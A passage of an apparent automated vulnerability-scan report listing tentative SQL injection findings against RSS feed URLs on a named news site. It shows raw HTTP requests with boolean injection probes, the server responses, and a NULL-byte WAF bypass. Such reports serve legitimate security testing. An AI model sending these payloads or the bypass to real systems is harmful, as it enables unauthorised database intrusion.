<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.13. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67192433%20or%201%3d1--%20 and 67192433%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d1--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d2--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.14. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss'%20and%201%3d1--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss'%20and%201%3d2--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close


1.16. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200729.xml

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18085221%20or%201%3d1--%20 and 18085221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d1--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:37 GMT
Content-Length: 23879
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1111/20101111__quakes~1.JPG"
length="154740"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York]]></title
...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d2--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 23889
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1104/20101104_091315_11.4.quakeslisting.jpg"
length="0"
type="image/jpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York
...[SNIP]...

1.17. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200733.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200733.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.18. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200736.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200736.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 55498630%20or%201%3d1--%20 and 55498630%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d1--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d2--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:33 GMT
Content-Length: 0
Connection: close


1.19. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200738.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200738.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:41 GMT
Content-Length: 0
Connection: close


1.20. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:04 GMT
Content-Length: 0
Connection: close


1.21. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15112565%20or%201%3d1--%20 and 15112565%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d1--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d2--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
